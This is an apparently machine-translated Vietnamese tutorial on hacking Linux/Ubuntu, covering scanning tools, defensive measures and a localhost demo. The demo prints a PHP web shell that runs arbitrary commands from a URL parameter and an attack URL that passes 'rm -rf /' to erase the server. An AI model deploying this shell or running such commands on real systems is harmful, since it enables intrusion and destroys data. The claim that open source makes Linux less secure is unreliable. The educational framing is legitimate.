Hack hệ điều hành Linux: Hack bằng Ubuntu (Hướng dẫn lệnh)
Linux là hệ điều hành máy chủ được sử dụng rộng rãi nhất, đặc biệt là đối với các máy chủ web. Nó là nguồn mở; điều này có nghĩa là bất kỳ ai cũng có thể có quyền truy cập vào mã nguồn. Điều này làm cho nó kém an toàn hơn so với các hệ điều hành khác vì kẻ tấn công có thể nghiên cứu mã nguồn để tìm lỗ hổng.. Linux for Hackers là khai thác những lỗ hổng này để có được quyền truy cập trái phép vào hệ thống.
Trong bài viết này, chúng tôi sẽ giới thiệu cho các bạn Linux là gì, các lỗ hổng bảo mật của nó, cách hack bằng Ubuntu và các biện pháp đối phó bạn có thể áp dụng.
Ghi chú nhanh trên Linux
Linux là một hệ điều hành mã nguồn mở. Có nhiều bản phân phối hệ điều hành dựa trên Linux như Redhat, Fedora và Ubuntu, v.v. Không giống như các hệ điều hành khác, Linux kém an toàn hơn khi nói đến bảo mật. Điều này là do mã nguồn có sẵn miễn phí, vì vậy, dễ dàng nghiên cứu lỗ hổng và khai thác chúng so với các hệ điều hành khác không phải là mã nguồn mở. Linux có thể được sử dụng làm hệ điều hành máy chủ, máy tính để bàn, máy tính bảng hoặc thiết bị di động.
Các chương trình Linux có thể được vận hành bằng GUI hoặc lệnh. Các lệnh Linux dành cho Kali Linux hack hiệu quả và hiệu quả hơn so với việc sử dụng GUI. Vì lý do này, việc biết các lệnh Linux cơ bản để hack sẽ rất hữu ích.
Tham khảo những hướng dẫn này https://www.guru99.com/unix-linux-tutorial.html về cách bắt đầu với Kali Linux hack
Công cụ hack Linux
- Nessus– công cụ này có thể được sử dụng để Ubuntu hack, quét cài đặt cấu hình, bản vá và mạng, v.v., bạn có thể tìm thấy nó tại https://www.tenable.com/products/nessus
- Bản đồ N. Công cụ này có thể được sử dụng để giám sát các máy chủ đang chạy trên máy chủ và các dịch vụ mà chúng đang sử dụng. Nó cũng có thể được sử dụng để quét các cổng. Nó có thể được tìm thấy tại https://nmap.org/
- SARA – SARA là từ viết tắt của Trợ lý nghiên cứu của Kiểm toán viên An ninh. Đúng như tên gọi, công cụ này có thể được sử dụng để kiểm tra mạng trước các mối đe dọa như SQL Injection, XSS, v.v. nó có thể được tìm thấy tại http://www-arc.com/sara/sara.html
Danh sách trên không toàn diện; nó cung cấp cho bạn ý tưởng về các công cụ có sẵn để Ubuntu hack và hack hệ thống Linux.
Cách ngăn chặn hack Linux
Linux Hacking lợi dụng các lỗ hổng trong hệ điều hành. Một tổ chức có thể áp dụng chính sách sau để bảo vệ mình khỏi các cuộc tấn công như vậy.
- Quản lý bản vá– các bản vá sửa các lỗi mà kẻ tấn công khai thác để xâm phạm hệ thống. Chính sách quản lý bản vá tốt sẽ đảm bảo rằng bạn liên tục áp dụng các bản vá có liên quan cho hệ thống của mình.
- Cấu hình hệ điều hành phù hợp– các cách khai thác khác lợi dụng điểm yếu trong cấu hình của máy chủ. Tên người dùng và daemon không hoạt động nên bị vô hiệu hóa. Cần thay đổi các cài đặt mặc định như mật khẩu chung cho ứng dụng, tên người dùng mặc định và một số số cổng.
- Hệ thống phát hiện xâm nhập– những công cụ như vậy có thể được sử dụng để phát hiện truy cập trái phép vào hệ thống. Một số công cụ có khả năng phát hiện và ngăn chặn các cuộc tấn công như vậy.
Hoạt động hack: Hack a Ubuntu Hệ thống Linux sử dụng PHP
Trong kịch bản thực tế này, chúng ta sẽ học cách hack bằng Ubuntu và chúng tôi sẽ cung cấp cho bạn thông tin cơ bản về cách bạn có thể sử dụng PHP để xâm phạm Linux. Chúng tôi sẽ không nhắm vào bất kỳ nạn nhân nào. Nếu muốn dùng thử, bạn có thể cài đặt LAMPP trên máy cục bộ của mình.
PHP có hai hàm có thể được sử dụng để thực thi các lệnh hack Linux. Nó có các hàm exec() và shell_exec(). Hàm exec() trả về dòng cuối cùng của đầu ra lệnh trong khi shell_exec() trả về toàn bộ kết quả của lệnh dưới dạng một chuỗi.
Để minh họa, chúng ta hãy giả sử kẻ tấn công tải tệp sau lên máy chủ web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ĐÂY,
Đoạn script trên nhận lệnh từ biến GET có tên cmd. Lệnh được thực thi bằng shell_exec() và kết quả được trả về trong trình duyệt.
Mã trên có thể được khai thác bằng cách sử dụng URL sau
http://localhost/cp/konsole.php?cmd=ls%20-l
ĐÂY,
- “…konsole.php?cmd=ls%20-l”gán giá trị ls –l cho biến cmd.
Lệnh trong Ubuntu để hack vào máy chủ sẽ được thực thi như
shell_exec('ls -l') ;
Thực thi đoạn mã trên trên máy chủ web sẽ cho kết quả tương tự như sau.
Lệnh trên chỉ hiển thị các tập tin trong thư mục hiện tại và các quyền
Giả sử kẻ tấn công truyền lệnh sau
rm -rf /
ĐÂY,
- “rm” xóa các tập tin
- “rf” làm cho lệnh rm chạy ở chế độ đệ quy. Xóa tất cả các thư mục và tập tin
- “/” hướng dẫn lệnh bắt đầu xóa các tập tin khỏi thư mục gốc
URL tấn công sẽ trông giống như thế này
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Tổng kết
- Linux là một hệ điều hành phổ biến dành cho máy chủ, máy tính để bàn, máy tính bảng và thiết bị di động.
- Linux là mã nguồn mở và mã nguồn có thể được lấy bởi bất kỳ ai. Điều này giúp dễ dàng phát hiện các lỗ hổng. Đây là một trong những hệ điều hành tốt nhất cho tin tặc.
- Các lệnh hack cơ bản và mạng trong Ubuntu có giá trị đối với tin tặc Linux.
- Lỗ hổng là điểm yếu có thể bị khai thác để xâm phạm hệ thống.
- Bảo mật tốt có thể giúp bảo vệ hệ thống khỏi bị kẻ tấn công xâm phạm.